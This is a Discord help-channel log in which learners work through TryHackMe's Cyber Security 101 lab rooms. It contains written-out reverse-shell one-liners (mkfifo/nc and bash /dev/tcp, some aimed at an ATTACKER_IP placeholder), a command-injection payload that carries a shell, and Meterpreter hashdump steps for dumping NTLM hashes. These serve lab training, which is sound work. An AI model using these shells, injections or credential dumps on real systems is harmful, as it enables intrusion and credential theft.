#cyber-security-101-path

and still you do not get that PLAIN after AUTH ??

yep

I cant connect to this one

sorry, then I do not have any idea
I hope someone with more knowlegde or experience can help you

don't worry thx for trying

YW

It seems TLS/SSL is now enabled on the target machine. It doesn't used to be. So, either the VM is faulty or THM has forgotten to update the page text. Anyway, you can still complete the assignment. Just use this command instead of the telnet command:

openssl s_client -starttls pop3 -connect IP_ADDRESS_OF_TARGET_MACHINE:110 -crlf -quiet

The actual pop3 commands remain the same.

Ok thanks you

and another "problem"

Burp suite basics
Task 10

I have done everything

but no wierd endpoint to see in my site map

what have I missed ?

You didn't click around enough

hmm, I thought I had all the links

the logo, all the menu items, a link to send a ticket, contact , two buttons

Then the endpoint should be there

and it is not 🙁

hint: the endpoint's name looks like gobbledygook

I know

but it is not there

Then I don't know, it works for me though.

I will try again 🙁

In the site map, left panel where you see the host's ip address, can you expand it, the endpoint should be visible there as well

moment, im trying again and burp is updating 🙁

goimng crazy

now the site map is empty 🙁

oke

no wierd endpoint to see

@fervent elm

Interesting... it's as if you have disabled javascript...

o, can I do that on a attackbox ??

In your firefox, browse to about:config then serach for javascript.enabled
What is it set to?

oke, to be certain, you mean the ff in the attackbox or my own ff ?

in the attackbox is is now true

the ff that you are using to browse to the site and which you have proxied to your burtp suite

oke, that is now true

do you mean it was false before?

not sure

@naive bramble I havent tried it from the attackbox. I'm using VPN and my own firefox/burp. Perhaps there is a problem with the attack box?

but with javascript.enabled is true

I see this:

@naive bramble I will spin up an attackbox and try it

oke, after lunch I will try it with my virtualbox kali

jeez, attackbox is so sloooow 🙄

free or a subscription ??

I have sub

Anyway, it works on the attackbox as well

So, not sure what you are doing differently

Maybe you can use Burp's ownbrowser instead of FF, just to eliminate FF as a possible culprit?

oke

im now trying to get foxyproxy work on my kali virtualbox

just to make sure, you did click on "Support", right?

yep

clicked on it

im starting attackbox again

oke, I see the site

starting up burp

intercept off
and then intercept on

no, leave intercept off

oke

and now I see the end-point

Does anyone know how to hack TikTok pages?

Ok, I think intercept was the culprit

and i have the flag

finally

so with the challenges I have to set the intercept on off

Does anyone know how to hack TikTok pages?

Intercept should only be on if you plan to modify stuff, or you want to study a flow step by step

The only clever thing to do with TikTok is to never install it.

oke, so for some challenges later it can be handy

next badge : 30 day streak 🙂

@fervent elm one question
A few days ago I tried the post-challenge explonation of meta sploit
Is it " normal" when you do migrate xxx and then hashmap that your session dies

What room/task?

page: https://tryhackme.com/room/meterpreter
room : Post-Exploitation Challenge
question: What is the NTLM hash of the jchambers user?

Sorry for the delay. Real life was calling. You have to migrate to a stable process. I suspect you migrated to lsass.exe, but that's not really a good choice. If you f.e. migrate to winlogon.exe instead hashdump should run without crashing the process. Fyi, you don't really need to migrate in this exercise as you are already running as SYSTEM.

totally not a problem
Im not in a hurry

Oke

the hint and the explanation said to migrate to lsass

You will need to migrate to the "lsass.exe" process first (ps will list its PID), then run "hashdump".

example from the text :

meterpreter > migrate 716
[*] Migrating from 1304 to 716...
[*] Migration completed successfully.
meterpreter >

I know, but lsass.exe just isn't very stable to run hashdump. You' should have better luck migrating to winlogon.exe.

oke

I will try that one

but first a break

Are you for yourself also busy with the security course
Or did you already did a path ?

@naive bramble I did a few paths already, currently doing "offensive pentesting" path, but it's going very slowly, partially because of real life (aka work) and partially because I do a lot of extra research on the side and get easily side-tracked. F.e. the brainstorm CTF go me side-tracking to buffer overflow, reverse engineering, and brushing up my ancient knowledge about assembler language 😀

oke

im still on the pre path
And doubt between the pentester and the security analyst path

but first finish the 101 path and I think that will costs me 1 - 2 weeks

Thinking first to do this one : Jr Penetration Tester

I have done: pre, 101, web fundamentals, jr pentest, and now offensive pentest

ultimate goal is OSCP exam

oke

I doubt between pentester or SOC 1 and 2

hope with the 101 I get a better idea what suits me

this could be a nice hobby for a old man like me

OSCP is a very expensive certificate

@fervent elm thanks for the help and have a good 2026
here in 7 hours it is 2026

Gave +1 Rep to @fervent elm (current: #610 - 12)

What do I do here wrong

gobuster vhost -u offensivetools.thm -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt --exclude-length 250-300

Track : Go buster the basics
Task : 6

Error message:

Error: error on running gobuster: unable to connect to http://offensivetools.thm/: Get "http://offensivetools.thm/": dial tcp [::1]:80: connect: connection refused

True. I don't generally believe in certification exams. I know enough people who have gotten this or that (fancy) certification and when it matters it appears they know really very little. The reason why I would like to do OSCP is because it's a very practical exam and it just sounds like crazy fun.

Connection refused always means the service is not running on that (address:)port. I suspect offensivetools.thm might not correctly resolve to an IP address...

Happy new year from a fellow old timer 😀

oke, age > 50 ???

pff

root@ip-10-81-127-3:~# cat /etc/resolv-dnsmasq 
nameserver 10.81.164.221

root@ip-10-81-127-3:~# gobuster vhost -u 10.81.164.221 --domain http://offensivetools.thm -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:             http://10.81.164.221
[+] Method:          GET
[+] Threads:         10
[+] Wordlist:        /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt
[+] User Agent:      gobuster/3.6
[+] Timeout:         10s
[+] Append Domain:   false
===============================================================
Starting gobuster in VHOST enumeration mode
===============================================================

Error: error on running gobuster: unable to connect to http://10.81.164.221/: Get "http://10.81.164.221/": http: invalid Host header

gobuster vhost -u "http://offensivetools.thm" --domain http://offensivetools.thm -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt --append-domain
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:             http://offensivetools.thm
[+] Method:          GET
[+] Threads:         10
[+] Wordlist:        /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt
[+] User Agent:      gobuster/3.6
[+] Timeout:         10s
[+] Append Domain:   true
===============================================================
Starting gobuster in VHOST enumeration mode
===============================================================

Error: error on running gobuster: unable to connect to http://offensivetools.thm/: Get "http://offensivetools.thm/": dial tcp [::1]:80: connect: connection refused

solved

the domain was not good

Did I do this good:

attackbox:

root@ip-10-81-76-2:~# nc -lvnp 443
Listening on 0.0.0.0 443
Connection received on 10.81.131.119 54464
$ uname -a
Linux tryhackme 5.15.0-1070-aws #76~20.04.1-Ubuntu SMP Mon Sep 2 12:20:36 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux
$ 

Target:

ubuntu@tryhackme:~$  rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | sh -i 2>&1 | nc 10.81.76.2 443 >/tmp/f

Room: Shells overview
Task: 3 (reverse shell)

I ask because my output looks other then the explanation

looks like you got a shell no? doesn't have to look like the example

When I type something behind the $ then I see a answer
but like you said It does totally not look at the examples
But got no idea what I have done wrong??

hmm

no real explanation how I get the shell to the target here :

Gaining Reverse Shell Access

Once we have our listener set, the attacker should execute what is known as a reverse shell payload. This payload usually abuses the vulnerability or unauthorized access granted by the attacker and executes a command that will expose the shell through the network. There's a variety of payloads that will depend on the tools and OS of the compromised system. We can explore some of them here.

As an example, let's analyze an example payload named a pipe reverse shell, as shown below.
rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | sh -i 2>&1 | nc ATTACKER_IP ATTACKER_PORT >/tmp/f

Attacker Receives the Shell

Once the above payload is executed, the attacker will receive a reverse shell, as shown below, allowing them to execute commands as if they were logging into a regular terminal in the OS.

I assumed that I have to do the shell on the target

hi , guys . i am confused . on networkin , wireshark task4 packet navigation question 2 . can anyone guide me please

What is it that you don't understand?

i can't know the step fpr gettting answer . please

did you read the comments of packet 12?

yes . it tell me to go on packet 39765

indeed. so did you go there?

yes

i go there , i look for JPEG , i right-click and choose the export packet bytes. i download the file and put it in desktop . when i open the file i find it empty .

You need to right-click on the line that says "JPEG File Interchange Format", then save as .jpg

ok , i try it now

Also, you don't need to open the file. You need to calculate its md5sum

Can some one help me with the shell problem I posted yesterday

how i can save it as a .jpg

which one

This one:

Did I do this good: 

attackbox: 

root@ip-10-81-76-2:~# nc -lvnp 443
Listening on 0.0.0.0 443
Connection received on 10.81.131.119 54464
$ uname -a
Linux tryhackme 5.15.0-1070-aws #76~20.04.1-Ubuntu SMP Mon Sep 2 12:20:36 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux
$ 

 

Target: 

ubuntu@tryhackme:~$  rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | sh -i 2>&1 | nc 10.81.76.2 443 >/tmp/f



Room:  Shells overview
Task: 3 (reverse shell) 

I ask because my output looks other then the explanation

which room exist the task

is stated in my question
Room: shells overview

Just save the file giving it .jpg as extension.

Looks fine. Why in doubt?

because on the page it looks like this:

attacker@kali:~$ nc -lvnp 443
listening on [any] 443 ...
connect to [10.4.99.209] from (UNKNOWN) [10.10.13.37] 59964
To run a command as administrator (user "root"), use "sudo ".
See "man sudo_root" for details.

target@tryhackme:~$

        

and that looks totally not on what I have

Doesn't matter. You get:

Listening on 0.0.0.0 443

Which is basically the same as "listening on [any] 443"

and

Connection received on 10.81.131.119 54464

which is similar to "connect to ... from...target_ip target_src_port

oke, then I can continue

but not today
Not feeling good after a few hours sleeping on new year eve

@fervent elm thanks for the confimation that im on the right way

Gave +1 Rep to @fervent elm (current: #563 - 13)

i don't attend this room yet . sorry

NP

Why do my sessions die

meterpreter > migrate 680
[*] Migrating from 3232 to 680...
[*] Migration completed successfully.
meterpreter > hashdump

[*] 10.82.134.207 - Meterpreter session 1 closed.  Reason: Died

Room: metasploit meterer
Task :6
Question: What is the NTLM hash of the jchambers user?

680 is the winlogon process
I tried also the lsass process but then also the session dies 🙁

wierd, now with lsass it works

finally this one also solved

sometimes that happens, sometimes you have to try again or maybe double check config

it this going well with the blue challenge :

msf6 post(multi/manage/shell_to_meterpreter) > run
[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 10.80.68.23:4433 
[*] Post module execution completed
msf6 post(multi/manage/shell_to_meterpreter) > 
[*] Sending stage (203846 bytes) to 10.80.141.102
[*] Meterpreter session 2 opened (10.80.68.23:4433 -> 10.80.141.102:49182) at 2026-01-02 16:26:51 +0000
[*] Stopping exploit/multi/handler
Interrupt: use the 'exit' command to quit
msf6 post(multi/manage/shell_to_meterpreter) > run
[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 10.80.68.23:4433 
[*] Post module execution completed
msf6 post(multi/manage/shell_to_meterpreter) > 
[*] Sending stage (203846 bytes) to 10.80.141.102
[*] Stopping exploit/multi/handler
[*] Meterpreter session 3 opened (10.80.68.23:4433 -> 10.80.141.102:49183) at 2026-01-02 16:29:18 +0000

?

yeah u are going good

oke, Was doubting because a lot of sessions are made
And after session 3 opened nothing seems to happen

This happened because you ran the module again. It is Not an error You just opened multiple Meterpreter sessions

oke
So I have to wait ??

Use That Cmd To Interact with only one - sessions -i 3

nope, it is not an issue

u should continue

but I cannot continue because I do not see a prompt

provide a screenshot

first take the exit from the module by - exit

Then list all session - sessions

then attach to meterpreter session - sessions -i 3

Then u should see something like that meterpreter >

Active sessions
===============

  Id  Name  Type                  Information            Connection
  --  ----  ----                  -----------            ----------
  1         shell x64/windows     Shell Banner: Microso  10.80.68.23:4444 -> 1
                                  ft Windows [Version 6  0.80.141.102:49180 (1
                                  .1.7601] -----         0.80.141.102)
  2         meterpreter x64/wind  NT AUTHORITY\SYSTEM @  10.80.68.23:4433 -> 1
            ows                    JON-PC                0.80.141.102:49182 (1
                                                         0.80.141.102)
  3         meterpreter x64/wind  NT AUTHORITY\SYSTEM @  10.80.68.23:4433 -> 1
            ows                    JON-PC                0.80.141.102:49183 (1
                                                         0.80.141.102)

now attach to one meterpreter session by running that cmd - sessions -i 3

done that

im now looking which process I schould use

2412  816   WmiPrvSE.ex  x64   0        NT AUTHORITY\SYST  C:\Windows\system3
             e                           EM                 2\wbem\wmiprvse.ex
                                                            e
 2416  2196  powershell.  x64   0        NT AUTHORITY\SYST  C:\Windows\System3
             exe                         EM                 2\WindowsPowerShel
                                                            l\v1.0\powershell.
                                                            exe
 2488  692   svchost.exe  x64   0        NT AUTHORITY\SYST
                                         EM
 2552  692   vds.exe      x64   0        NT AUTHORITY\SYST
                                         EM
 2628  692   sppsvc.exe   x64   0        NT AUTHORITY\NETW
                                         ORK SERVICE
 2740  692   SearchIndex  x64   0        NT AUTHORITY\SYST
             er.exe                      EM
 3020  1608  powershell.  x64   0        NT AUTHORITY\SYST  C:\Windows\system3
             exe                         EM                 2\WindowsPowerShel
                                                            l\v1.0\powershell.
                                                            exe
 3028  544   conhost.exe  x64   0        NT AUTHORITY\SYST  C:\Windows\system3
                                         EM                 2\conhost.exe

List all of the processes running via the 'ps' command. Just because we are system doesn't mean our process is. Find a process towards the bottom of this list that is running at NT AUTHORITY\SYSTEM and write down the process id (far left column).

Looks like I could use powershell or conhost

i think u should go with 3028 conhost.exe x64 NT AUTHORITY\SYSTEM

powershell.exe → temporary, may die
SearchIndexer.exe → can restart
that's why u should go with conhost

oke

thanks

one problem to solve:

cat c:/windows/system/config/flag2.txt
[-] stdapi_fs_stat: Operation failed: The system cannot find the path specified

u write the path wrong try - cat C:\Windows\System32\config\flag2.txt

Thanks,
Blue also solved

now further on this path 🙂

No Prob

Continue ur learning

I will ,
A lot to do before I can begin on the jr. pentester track

@edgy smelt what path(s) did you do?

Pentester

I hope I can finish that one somewhere this year

@edgy smelt thanks from a cold and wet Netherlands

Gave +1 Rep to @edgy smelt (current: #236 - 43)

Always here For Help!

nice to hear for a beginner that there are experience people learn beginners like me things

im confused at the shells room

I have to do this:

Using a web shell, exploit the unrestricted file upload vulnerability and get a shell. What is the content of the flag saved in the / directory?

but when i use for example this :

bash -i >& /dev/tcp/ATTACKER_IP/443 0>&1

To get it into the target box I could use ssh
But then I would not have to use the reverse shell

When i enter:

;rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | bash -i 2>&1 | nc -l 0.0.0.0 4444 > /tmp/f; 

And on attack box:

nc -lvnp 4444

but no connection

What am I doing wrong ?/

Room: Shells overview
Task : 8

What type of shell are you trying to do? As you supplied the flag -l on nc, it is on listening mode on your target. Meaning it is waiting for connections (plus you set the IP to 0.0.0.0).

If you want it to connect back to your attack machine (reverse shell), you should remove that flag. Or you can try to connect to the target by typing nc <target IP>

You don't use this to get into the target box. This is a bash reverse shell that is intended to run inside the target and to establish an outbound connection to your listener on the attack box. That is the concept of a reverse shell: trigger a shell on the target that establishes an outbound connection to the attacker (listener). The opposite is called a bind shell where shell and listener are on the target and attacker establishes an inbound connection, but this direction of connection establishment is less likely to be allowed by firewalls.
Also, you mentioned "web shell", but this is not a reverse web shell. A web shell is written in a language supported by the web server, f.e. PHP, ASP, etc.

room:shells overview is not working it worked before day but now its showing any tasks

try to refresh and clear your cache, had the same problem with another room

@fervent elm @late quarry
Then I have to look well what shell to use

all shells mentioned have to run on the target machine
But as far as I know im doing this because I upload the shell with a upload screen

I try the reverse or bind shell

I tried :

;rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | bash -i 2>&1 ; 
;rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | bash -i 2>&1 | nc -l 0.0.0.0 4444 > /tmp/f; 
;rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | bash -i 2>&1 | nc -l 80.1.1.1. 4444 > /tmp/f; 
;rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | bash -i 2>&1 | nc 0.0.0.0 4444 > /tmp/f; 

but all not a success

What payload did you use for reverse shell? Bind shell?

Also, not sure why you keep starting your payloads with ;.

I only upload that script
And use nc on my attackbox
@late quarry

and I placed it between two ; because of this hint

This is the hint you’re looking for: Place your reverse shell payload in between two ;

or schould I use something like this;

 bash -i >& /dev/tcp/ATTACKER_IP/443 0>&1 

also this one is not working

 bash -i >& /dev/tcp/10.81.95.82/4444 0>&1 

@late quarry

I wonder if the problem is not here:

root@ip-10-81-95-82:~# nc -nlvp 4444
Listening on 0.0.0.0 4444

This is just the listener intended to receive the connection from your target running the reverse shell

Then I do not have a clue what I do wrong

I use a listener
Am uploaded a reverse shell

and still no connection 🙁

Use this payload (update the IP of your attack machine as necessary) -

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.81.95.82 4444 >/tmp/f

With this listener..

oke, just at home

@late quarry still no luck

did you remember the '?

is this a question for me ??

yep

if so, I do not see what it has to do with my question

ok so you have to give the instruction to hash a file first right

then you give your instruction

so the program does both

i wanted to use the ; sign

yes

or do you mean i Have to use the ; ?
tried that with also no luck

wanna go to vc??

vc ??

voice chat

no, im very bad at English and I hate vc
Sorry

it was so i could see your screen haha

ok so remember that when you use a vulnerabilitie like command injection

you have to somewhat respect the original syntaxis

so

hello.txt; <your nc command>

Try with
||hello.txt; rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | sh -i 2>&1 | nc 10.80.97.85 444 >/tmp/f||

I did some corrections you were missing

Thanks, adding the hello.txt works

finally this one solved

@ivory prairie thanks a lot

Gave +1 Rep to @ivory prairie (current: #3514 - 1)

always to help UwU

I can't download the task files from task 5 in cyberchefbasics, anybody can send it to me :(

is opera gx blocking the button or something?

sorry, im not so far at the moment

guys i want to learn cyber security but i don `t understand

@ivory prairie do you have the files
Otherwise here you go:

thank you babes

babes ??

it's a very affeminate phrase haha

don't worry about it

i do not as a old crumpy man 🙂

GN

Hi,

I'm doing the practical shell exercice (task 8 in shell room). We're supposed to have a landing page at:
10.80.135.15:8080

I tried to access this landing page, but it doesn't work. And yes, the attackBox (10.80.68.87) can ping the vulnerable machine (10.80.135.15).

I also tried localhost:8080 in the browser on the vulnerable machine, it doesn't work as well.

Nevermind I found ; I was still using the machine from Task 1, I had to stop it and then start the machine of task 8 to make it work

I had the same problem 2 days ago and now I feel like we are family

For me tomorrow chapter 12 - 13 - 14 and then this part is ready

Cool, and then which path are you gonna follow?

Doubt between security analyst and jr pen tester

and you ?

@main bane

Oh nice! Me I'm sure I'll do the Security Engineer path after this one. I already have a computer science engineer degree, so that can help to get a job.

Nice

May I have a hint here:

OWASP Top 10 2025: Application Design Flaws
Task 4 crypto failures

I found the key but how do I know what decrypt method I need to use

So I came here to report this bug, but I already found lots of messages addressing it, some from months ago. Is there another way to report a bug in a room other than discord?

I think #1333993673381253162 is the proper place.

@fervent elm did you send all the snow to the Netherlands 😛 ?

No, I'm keeping some in my freezer 😛

oke

then I have to find someone else to blame

got it! In hindsight I should have thought about that lol. thanks.

Gave +1 Rep to @fervent elm (current: #499 - 15)

well it turns out there is already a bug report on the issue, but OP closed it saying that restarting the machine a couple of times solved it. I tried that and it didnt work, and I see no reason why that would solve this particular issue. https://discord.com/channels/521382216299839518/1444920113089347614

So I replied to the thread explaining the problem, workaround and the possible solutions. I am not sure if this is enough to reopen the issue though. But I will leave it at that.

How would I l know how to decrypt this :

77xØvFB–’eôâ§U­JðGèÿÃùg)¹®ƒ}h¥}
[/©À¯v®HcÁ×ýâh|»EÛ¥úz^ÙøG_2ž{Õ®áûëÍÊÂüÙëä
ɱViç@Ù'bH^

Almost looks like my hand-writing 🤣 Where did you find that?

Owasp top 10 : task 4

you get this one :

Nzd42HZGgUIUlpILZRv0jeIXp1WtCErwR+j/w/lnKbmug31opX0BWy+pwK92rkhjwdf94mgHfLtF26X6B3pe2fhHXzIGnnvVruH7683KwvzZ6+QKybFWaedAEtknYkhe 

With as hint:

Nothing of interest could be detected about the input data.
Have you tried modifying the operation arguments?

@fervent elm
Still trying out what this means?

the hint

but from base 64 and something else do not have arguments

Note: The decryption feature is currently unavailable. Contact your administrator for access.

This makes me think you should investigate the web site.

I did already and on one place I found a key

but I solved this with some cyberchef try and error

Be sure to look at all of the information the site is sending to you, and this includes all files (HTML, CSS, JS)

I did but find nothing that could lead to a api

Check the JS?

I did ,there I found a key

Try pasting the function code into google too for analysis

oke
ChatGPT found this :

If you want to correctly identify the intended method

Based on naming alone (NOT implementation), the author likely intended:

AES-128 in ECB mode

IM going to leave this channel.
Did this course in 3 -4 weeks and it was fun

Everyone who helped me in this journey thanks a lot
Time to try the Soc courses

@naive bramblegood luck

Can anyone help me with the analysis of the result obtained after cracking the hash values asked in the questions in Hashing Basics room. The hashes corresponding to first three questions results in the corresponding data-

1. Hash: 85208520
   Candidates. #1.....85208520 -> 25251325.
   The answer to the first question was 85208520
2. Hash: halloween
   Candidates. #1....gators -> dangerous.
   The answer to this question was "halloween"
3. Hash: spaceman
   Candidates.#1....sunshine13 -> scrubs.
   The answer to question was "spaceman"
   My doubt is which one of the obtained values is the password and what is meant by the other output values.

Other outputs are just the program giving you status about what it is checking at the current time?

I'm currently in the Networking Core Protocols room. I'm on task 4, but I can't figure out the login credentials for Telnet. Anyone able to help?

No, no, no, you cannot leave. Now you must help others in this channel. That's how it works 😛

oke

We are snowed in so I cannot leave house today

@fervent elm today code orange here in the Netherlands

You guys keep all the fun to yourselves 😢

no fun

daugther is today at home.
Work has shut down so she is bored already 😢

and im tired like hell like the last few weeks

Thet expect 5 - 10 cm snow @fervent elm

how much time will it take to finish 101?

depends on how many time you can spend

if im right,you can find the answer on the page when you are ready when you spend x hour a week

@harsh lance you do not need credentials to use telnet. Just use telnet and ip address

I got it figured out. Thanks for the response though

Gave +1 Rep to @limber lily (current: #2284 - 2)

i just opened the dicord after so many days

good that you found that

Have someone here finished cyber-101. And how long did it take?

the machine in AD Basics isnt working 🙁

CAN any one help me to find this answer What is the name of the service listening on port 135?

@thorn patio

@cerulean tulip

What command are you running?

@lethal sluice i used netstat -abon

the answer came like big and but i searched in google i got answer

I think nmap / a port scanner would be a better way to scan for ports in this case.

If i looked at netstat correctly, it shows all listening ports for your device.

exit split screen view and re-enable it, that worked for me

Hi ! I have a question about Active Directory Basics https://tryhackme.com/room/winadbasics

task 2, the VM do not want to open

any recommandations ?

Hey everyone. Looking for some help, Im in the Application Design Flaws OWASP Top 10 room. I'm at the software supply chain failures section. Completely stuck. Not sure what to do. I've tried this curl request with the python script they provided in the task files: "curl -X POST -d script.py <Target URL>" but getting an unsupported media type error

I feel like they gave a pretty vague explaination and then just threw me in the deep end on this one lol. And the hint is just to check /api/process. I'm not really getting anything from that other than I won't be getting this flag through the browser

hello guys , i am stuck on question 2 of task 4 of wire shark basics , they have asked to input MD5 hash of the image; i acquired this hash "15e4fa8321e1ae47590f2766a3ae035a" but this is not working , can any one pls help

The FlareVM is basically unusable. You can only start one app before it just freezes.

I felt the same. If still stuck, ping here?

I’ll give you a little hint. Take a look at the task file to see if there’s anything interesting about “data”. Then read the website carefully. What does it accept? You need to write a python script sending a POST request to the website. If stuck, you can DM me.

In the john the ripper room, It wants me to get the flag inside the zip file, do I extract it in vm?

Yeah

Ohh ok thanks

Gave +1 Rep to @lethal sluice (current: #667 - 11)

Little lost on the last question for Task 6 in Windows Powershell

'Now a small challenge to put it all together. This shady lad that we just found hidden among the local users has his own home folder in the "C:\Users" directory.
Can you navigate the filesystem and find the hidden treasure inside this pirate's home?'

Not sure where I am going wrong as when I cd 'C:\users\plr4t3' - it tells me that it does not exist

maybe put some \\ instead of \

C:\\Users\\plr4t3

you can use curl too if that's easier

Hello! Should i wait this finish? very slow

Try using /dirb/common.txt as a wordlist instead, it's way shorter.

Hello, How are you guys?
I need some help understanding what I am doing wrong? I am currently on the Active Directory course and I need to reset Claire's password AS phillip but the powershell keeps showing administrator and not phillip. I have tried changing it but i am not sure how.

Nevermind, I figured it out.

NExt question, how exactly do I log onto sophie's computer? Because I can't sign out on the VM and I am not using the RDP version ?

Thank you, turn out it 1 not L thats where I went wrong 🤣

Gave +1 Rep to @dapper pulsar (current: #3538 - 1)

Hey @forest axle im stuck there too. how did you get powershell to show admin and not phillip? When i try to RDP in, it doesnt accept phillips machine as a connectable device, Or am i supposed to use the attackbox

Im not 100% sure since i cant remember the Room without any more Information but i think i started the normal Machine suggested in the Task + attack machine on the Top
Then i used the second Machine to connect on the first Machine and logged into the Computer

So in the power shell, I used “cd.. “ to go up a level then “cd Phillip” I was able to run the commands that way but after, I couldn’t figure out how to log onto Sophie’s computer the same way or not so I am stuck

I’ll try that and see if it works, thank you!

Gave +1 Rep to @polar shoal (current: #2294 - 2)

Sure hit me up if you need further help

Can I message you privately or stick to here?

Pm me if you want

Hey, Im doeing the "Blue" room but I can't manage to run the exploit. Each times I run the "exploit" command, it fails. I tried to reboot the machine but it didnt help. Here are my options. Can you help me please

https://tryhackme.com/room/blue?taskNo=2&sharerId=6446c80b75cd830043f2d31d

Check to see if the LHOST ip is the ip of the interface listening on your machine.

I went to bed so I check tomorrow but there is a high probability that this is why it doesn't work

Yeah, usually it chooses a different interface and we need to manually enter the one connected to the VPN.

Yeah I already got the same problem but didn't think about it lol

Hey. Does anyone have any reccomendations for reading material on powershell? I feel like I need to work more on Powershell room from the Sec 101 path.

Same here or at least practice materials

Probably a silly question but how can I copy and paste into the attack box? Ive done the usual ctrl+c and the ctrl+v but its like it doesnt transfer from the normal windo to the emulation

it seems to work with chromium based browsers, but with firefox you have to use the little popout for paste

the line that divides the two halves of the screen is a little thicker in the middle and you can pop out a menu for paste there

Ah that makes sense. I am using firefox

Guys it says oops this page failed
To load

Why is tryhackme’s availability so bad

Its probably cause i bought the subscription sorry guys

estoy en el ejercicio 7 de hashing basic, la pregunta es:
What’s the hashcat mode number for HMAC-SHA512 (key = $pass)?

jahsja lo encontre justo cuando envie la pregunta, una disculpita

no se puede, hay un bloc de notas dentro de la maquina virtual, ahi lo puedes hacer pero es con el mause

I have one more room but the queue got me 😔

It's back! Time to complete the last room :D

I did it!!! I completed the path :D

Congrats!! 🎉

Thanks!

What's your next path?

Probably SOC Level 1

Good luck!

I’m doing the Networks module, and I’ve been writing notes in Markdown for them. I’m understanding everything insanely better in that context.

Just worked about forgetting everything

@shy kiln a nice path.
Im following it right now

In the exercise of the Metasploit:Exploitation Task 6 Msfvenom, I was unable to get the meterpreter session opened successfully. After starting the reverse TCP handler in the attackbox, run ./payload.elf in the target machine. Each time going back to the attackbox I got "Meterpreter session 1 closed. Reason: Died". Please help. Thanks.

Try a few different types of payloads? Both one shot and staged?

I used linux/x86/meterpreter/reverse_tcp payload. I was told to double check whether the target machine is 32-bit or 64-bit before generating the payload.

Penderrin, what are other types of payload I could try?

Guys Im new here, if someone could help me out with cybersecurity

@jagged currentin which role you have interest?

hii guys im new here and im interested in bug bounty how to begin and what to learn ?? can some one help me with it

@limber lily Pentesting

try completing pre security and cyber security path 101

Metasploit: Meterpreter

Can someone help me get a meterpreter running for this lab?

I just made a pause learning and got stuck here, I can't exploit the machine to get a session, I used eternalblue but it's not vulnerable to it

nvm

I gave a couple suggestions in the chat message above. For more details, check out: https://tryhackme.com/module/metasploit

@limber lily thanks

Gave +1 Rep to @limber lily (current: #1752 - 3)

~~Morning everyone (well, whoever is in the UK that is), just doing a sense-check while starting on Wireshark: The Basics.

Task 2, question 1: I am not seeing the "JPEG" mentioned in the comments, not sure if I have missed a terminology or something more obvious....

"Go to packet number *****
Look at the "packet details pane". Right-click on the JPEG section and "Export packet bytes". This is an alternative way of extracting data from a capture file. What is the MD5 hash value of extracted image?" "

I have exported the first line, and went in to that file's properties and found the MD5 hash, but it no worky on crackstation or cyberchef :/~~

Solved: I was working from the merged file after following the steps. Left and opened the Exercise.pcappng file and all shows as it should!

Just wondering, whilst running through the 101 path are there any good challenges etc or anything else that can be done to reinforce the learning.

I would recommend going to the Learn section of THM and filter rooms by Info or Easy - pick a topic that seems interesting 🙂

Thanks. I dont see rooms under the Learn Section. There are modules which are obviously covered under the various "Paths".
And then there are Walkthroughs and Networks.

Is it recommended to go through the Walkthroughs or Networks before trying Challenges?

Gave +1 Rep to @glad hound (current: #427 - 19)

Sorry, I meant Learn > Walkthroughs

Then on Difficulty you I would recommend Info or Easy.

It's never wrong to try out a challenge. They can be pretty tough and not really covered in the 101-path, but the info is out there and if you're curious/stubborn enough you'll eventually solve it

Thank you for the help and advice!

Gave +1 Rep to @glad hound (current: #407 - 20)

Hi guys…please can someone help me with the Lab Practical Task in the Shell Overview room? Am stuck on it for hours…I can’t obtain a reverse shell regardless of all the suggestions I had from echo.

I haven't done the room yet, but what type of shell is it supposed to be? Is it a reverse shell?

I am only 55% done with the pathway, so I have not gotten that far yet

Hi all,
I'm doing the Metasploit - Exploitation room and I do have an issue with the last exercise from task 2.
==> "What is the "penny" user's SMB password? Use the wordlist mentioned in the previous task. "

I have set my RHOSTS , PASS_FILE and SMBUSER but I get this error:
"Msf::OptionValidateError One or more options failed to validate: PASS_FILE."

Any Idea how to solve that error ?
I have checked on Google ans with AI but can't find a proper solution...

Thanks

hii

Yeah it’s either reverse shell or bind shell.

For reverse shell: https://www.invicti.com/learn/reverse-shell

For bind shell: https://www.geeksforgeeks.org/linux-unix/bind-command-in-linux-with-examples/

Also, I may have a different opinion than you, but I have found that not using the AI model and being able to look up resources, YT vids, man pages, etc. have been quite helpful. I wish you the best of luck, OP

Alright 👍
Thanks dude…really appreciate.

Gave +1 Rep to @grand widget (current: #3577 - 1)

Hello Guys, on Hydra lab I am running this command but I cannot get the password, I am surely doing something wrong but don't know what. I get the 50h+ estimated waiting time.

can somebody help me ?

Same for me.
The echo hint tells me that if there are over 30 attempts I'm doing something wrong. So I tried the sudo as it appears in one example on the page.
I checked proper spelling of the login page's html code, and the fields are password and username so they are fine.
I checked the method and it is POST.
I checked with the username molly and Molly as well.
It doesn't work.

hey, I found out what caused the problem.
Go to the first example command on the site when it gets to the POST WEB FORM part, this one:
"sudo hydra <username> <wordlist> 10.67.155.68 http-post-form "<path>:<login_credentials>:<invalid_response>""

Compare it to your command, and you'll see that something is missing.
